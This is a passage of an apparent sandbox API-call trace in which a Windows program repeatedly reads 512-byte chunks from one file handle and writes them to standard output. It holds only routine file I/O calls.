[0112.739] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.739] GetFileType (hFile=0x4c) returned 0x1 [0112.739] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.739] WriteFile (in: hFile=0x4c, lpBuffer=0x28f2e4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f2e4*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.739] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.739] GetFileType (hFile=0x4c) returned 0x1 [0112.739] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.739] WriteFile (in: hFile=0x4c, lpBuffer=0x28f334*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f334*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.739] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.739] GetFileType (hFile=0x4c) returned 0x1 [0112.739] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.739] WriteFile (in: hFile=0x4c, lpBuffer=0x28f384*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f384*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.739] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.739] GetFileType (hFile=0x4c) returned 0x1 [0112.739] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.739] WriteFile (in: hFile=0x4c, lpBuffer=0x28f3d4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f3d4*, lpNumberOfBytesWritten=0x28e3d8*=0x20, lpOverlapped=0x0) returned 1 [0112.739] _get_osfhandle (_FileHandle=4) returned 0x54 [0112.739] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x28e3c4 | out: lpNewFilePointer=0x0) returned 1 [0112.739] _get_osfhandle (_FileHandle=4) returned 0x54 [0112.740] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.740] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.740] GetFileType (hFile=0x4c) returned 0x1 [0112.740] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.740] GetFileType (hFile=0x4c) returned 0x1 [0112.740] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.740] WriteFile (in: hFile=0x4c, lpBuffer=0x28f1f4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.740] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.740] GetFileType (hFile=0x4c) returned 0x1 [0112.740] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.740] WriteFile (in: hFile=0x4c, lpBuffer=0x28f244*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f244*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.740] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.740] GetFileType (hFile=0x4c) returned 0x1 [0112.740] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.740] WriteFile (in: hFile=0x4c, lpBuffer=0x28f294*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f294*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.740] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.740] GetFileType (hFile=0x4c) returned 0x1 [0112.740] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.740] WriteFile (in: hFile=0x4c, lpBuffer=0x28f2e4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f2e4*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.740] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.740] GetFileType (hFile=0x4c) returned 0x1 [0112.740] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.740] WriteFile (in: hFile=0x4c, lpBuffer=0x28f334*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f334*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.740] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.740] GetFileType (hFile=0x4c) returned 0x1 [0112.740] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.740] WriteFile (in: hFile=0x4c, lpBuffer=0x28f384*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f384*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.740] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.740] GetFileType (hFile=0x4c) returned 0x1 [0112.740] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.740] WriteFile (in: hFile=0x4c, lpBuffer=0x28f3d4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f3d4*, lpNumberOfBytesWritten=0x28e3d8*=0x20, lpOverlapped=0x0) returned 1 [0112.741] _get_osfhandle (_FileHandle=4) returned 0x54 [0112.741] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x28e3c4 | out: lpNewFilePointer=0x0) returned 1 [0112.741] _get_osfhandle (_FileHandle=4) returned 0x54 [0112.741] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.741] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.741] GetFileType (hFile=0x4c) returned 0x1 [0112.741] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.741] GetFileType (hFile=0x4c) returned 0x1 [0112.741] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.741] WriteFile (in: hFile=0x4c, lpBuffer=0x28f1f4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.741] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.741] GetFileType (hFile=0x4c) returned 0x1 [0112.741] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.741] WriteFile (in: hFile=0x4c, lpBuffer=0x28f244*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f244*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.741] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.741] GetFileType (hFile=0x4c) returned 0x1 [0112.741] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.741] WriteFile (in: hFile=0x4c, lpBuffer=0x28f294*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f294*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.741] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.741] GetFileType (hFile=0x4c) returned 0x1 [0112.741] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.741] WriteFile (in: hFile=0x4c, lpBuffer=0x28f2e4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f2e4*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.741] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.741] GetFileType (hFile=0x4c) returned 0x1 [0112.741] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.741] WriteFile (in: hFile=0x4c, lpBuffer=0x28f334*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f334*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.741] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.741] GetFileType (hFile=0x4c) returned 0x1 [0112.741] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.741] WriteFile (in: hFile=0x4c, lpBuffer=0x28f384*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f384*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.741] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.741] GetFileType (hFile=0x4c) returned 0x1 [0112.741] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.741] WriteFile (in: hFile=0x4c, lpBuffer=0x28f3d4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f3d4*, lpNumberOfBytesWritten=0x28e3d8*=0x20, lpOverlapped=0x0) returned 1 [0112.742] _get_osfhandle (_FileHandle=4) returned 0x54 [0112.742] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x28e3c4 | out: lpNewFilePointer=0x0) returned 1 [0112.742] _get_osfhandle (_FileHandle=4) returned 0x54 [0112.742] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.742] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.742] GetFileType (hFile=0x4c) returned 0x1 [0112.742] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.742] GetFileType (hFile=0x4c) returned 0x1 [0112.742] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.742] WriteFile (in: hFile=0x4c, lpBuffer=0x28f1f4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.742] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.742] GetFileType (hFile=0x4c) returned 0x1 [0112.742] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.742] WriteFile (in: hFile=0x4c, lpBuffer=0x28f244*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f244*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.742] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.742] GetFileType (hFile=0x4c) returned 0x1 [0112.742] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.742] WriteFile (in: hFile=0x4c, lpBuffer=0x28f294*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f294*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.742] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.742] GetFileType (hFile=0x4c) returned 0x1 [0112.742] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.742] WriteFile (in: hFile=0x4c, lpBuffer=0x28f2e4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f2e4*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.742] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.742] GetFileType (hFile=0x4c) returned 0x1 [0112.742] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.742] WriteFile (in: hFile=0x4c, lpBuffer=0x28f334*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f334*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.742] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.742] GetFileType (hFile=0x4c) returned 0x1 [0112.742] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.742] WriteFile (in: hFile=0x4c, lpBuffer=0x28f384*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f384*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.742] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.742] GetFileType (hFile=0x4c) returned 0x1 [0112.742] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.742] WriteFile (in: hFile=0x4c, lpBuffer=0x28f3d4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f3d4*, lpNumberOfBytesWritten=0x28e3d8*=0x20, lpOverlapped=0x0) returned 1 [0112.743] _get_osfhandle (_FileHandle=4) returned 0x54 [0112.743] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x28e3c4 | out: lpNewFilePointer=0x0) returned 1 [0112.743] _get_osfhandle (_FileHandle=4) returned 0x54 [0112.743] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.743] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.743] GetFileType (hFile=0x4c) returned 0x1 [0112.743] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.743] GetFileType (hFile=0x4c) returned 0x1 [0112.743] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.743] WriteFile (in: hFile=0x4c, lpBuffer=0x28f1f4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.743] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.743] GetFileType (hFile=0x4c) returned 0x1 [0112.743] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.743] WriteFile (in: hFile=0x4c, lpBuffer=0x28f244*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f244*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.743] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.743] GetFileType (hFile=0x4c) returned 0x1 [0112.743] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.743] WriteFile (in: hFile=0x4c, lpBuffer=0x28f294*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f294*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.743] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.743] GetFileType (hFile=0x4c) returned 0x1 [0112.743] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.743] WriteFile (in: hFile=0x4c, lpBuffer=0x28f2e4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f2e4*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.743] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.743] GetFileType (hFile=0x4c) returned 0x1 [0112.743] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.743] WriteFile (in: hFile=0x4c, lpBuffer=0x28f334*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f334*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.743] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.743] GetFileType (hFile=0x4c) returned 0x1 [0112.743] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.743] WriteFile (in: hFile=0x4c, lpBuffer=0x28f384*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f384*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.743] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.743] GetFileType (hFile=0x4c) returned 0x1 [0112.743] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.743] WriteFile (in: hFile=0x4c, lpBuffer=0x28f3d4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f3d4*, lpNumberOfBytesWritten=0x28e3d8*=0x20, lpOverlapped=0x0) returned 1 [0112.744] _get_osfhandle (_FileHandle=4) returned 0x54 [0112.744] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x28e3c4 | out: lpNewFilePointer=0x0) returned 1 [0112.744] _get_osfhandle (_FileHandle=4) returned 0x54 [0112.744] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.744] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.744] GetFileType (hFile=0x4c) returned 0x1 [0112.744] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.744] GetFileType (hFile=0x4c) returned 0x1 [0112.744] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.744] WriteFile (in: hFile=0x4c, lpBuffer=0x28f1f4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.744] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.744] GetFileType (hFile=0x4c) returned 0x1 [0112.744] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.744] WriteFile (in: hFile=0x4c, lpBuffer=0x28f244*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f244*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.744] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.744] GetFileType (hFile=0x4c) returned 0x1 [0112.744] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.744] WriteFile (in: hFile=0x4c, lpBuffer=0x28f294*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f294*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.744] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.744] GetFileType (hFile=0x4c) returned 0x1 [0112.744] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.744] WriteFile (in: hFile=0x4c, lpBuffer=0x28f2e4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f2e4*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.744] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.744] GetFileType (hFile=0x4c) returned 0x1 [0112.744] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.744] WriteFile (in: hFile=0x4c, lpBuffer=0x28f334*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f334*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.744] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.744] GetFileType (hFile=0x4c) returned 0x1 [0112.744] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.744] WriteFile (in: hFile=0x4c, lpBuffer=0x28f384*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f384*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.744] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.744] GetFileType (hFile=0x4c) returned 0x1 [0112.744] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.744] WriteFile (in: hFile=0x4c, lpBuffer=0x28f3d4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f3d4*, lpNumberOfBytesWritten=0x28e3d8*=0x20, lpOverlapped=0x0) returned 1 [0112.745] _get_osfhandle (_FileHandle=4) returned 0x54 [0112.745] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x28e3c4 | out: lpNewFilePointer=0x0) returned 1 [0112.745] _get_osfhandle (_FileHandle=4) returned 0x54 [0112.745] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.745] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.745] GetFileType (hFile=0x4c) returned 0x1 [0112.745] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.745] GetFileType (hFile=0x4c) returned 0x1 [0112.745] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.745] WriteFile (in: hFile=0x4c, lpBuffer=0x28f1f4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.745] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.745] GetFileType (hFile=0x4c) returned 0x1 [0112.745] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.745] WriteFile (in: hFile=0x4c, lpBuffer=0x28f244*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f244*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.745] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.745] GetFileType (hFile=0x4c) returned 0x1 [0112.745] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.745] WriteFile (in: hFile=0x4c, lpBuffer=0x28f294*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f294*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.745] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.745] GetFileType (hFile=0x4c) returned 0x1 [0112.745] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.745] WriteFile (in: hFile=0x4c, lpBuffer=0x28f2e4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f2e4*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.745] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.745] GetFileType (hFile=0x4c) returned 0x1 [0112.745] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.745] WriteFile (in: hFile=0x4c, lpBuffer=0x28f334*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f334*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.745] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.745] GetFileType (hFile=0x4c) returned 0x1 [0112.745] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.745] WriteFile (in: hFile=0x4c, lpBuffer=0x28f384*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f384*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.745] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.745] GetFileType (hFile=0x4c) returned 0x1 [0112.745] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.745] WriteFile (in: hFile=0x4c, lpBuffer=0x28f3d4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f3d4*, lpNumberOfBytesWritten=0x28e3d8*=0x20, lpOverlapped=0x0) returned 1 [0112.746] _get_osfhandle (_FileHandle=4) returned 0x54 [0112.746] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x28e3c4 | out: lpNewFilePointer=0x0) returned 1 [0112.746] _get_osfhandle (_FileHandle=4) returned 0x54 [0112.746] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.746] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.746] GetFileType (hFile=0x4c) returned 0x1 [0112.746] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.746] GetFileType (hFile=0x4c) returned 0x1 [0112.746] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.746] WriteFile (in: hFile=0x4c, lpBuffer=0x28f1f4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.746] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.746] GetFileType (hFile=0x4c) returned 0x1 [0112.746] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.746] WriteFile (in: hFile=0x4c, lpBuffer=0x28f244*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f244*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.746] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.746] GetFileType (hFile=0x4c) returned 0x1 [0112.746] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.746] WriteFile (in: hFile=0x4c, lpBuffer=0x28f294*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f294*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.746] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.746] GetFileType (hFile=0x4c) returned 0x1 [0112.746] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.746] WriteFile (in: hFile=0x4c, lpBuffer=0x28f2e4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f2e4*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.746] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.746] GetFileType (hFile=0x4c) returned 0x1 [0112.746] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.746] WriteFile (in: hFile=0x4c, lpBuffer=0x28f334*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f334*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.746] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.746] GetFileType (hFile=0x4c) returned 0x1 [0112.746] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.746] WriteFile (in: hFile=0x4c, lpBuffer=0x28f384*, 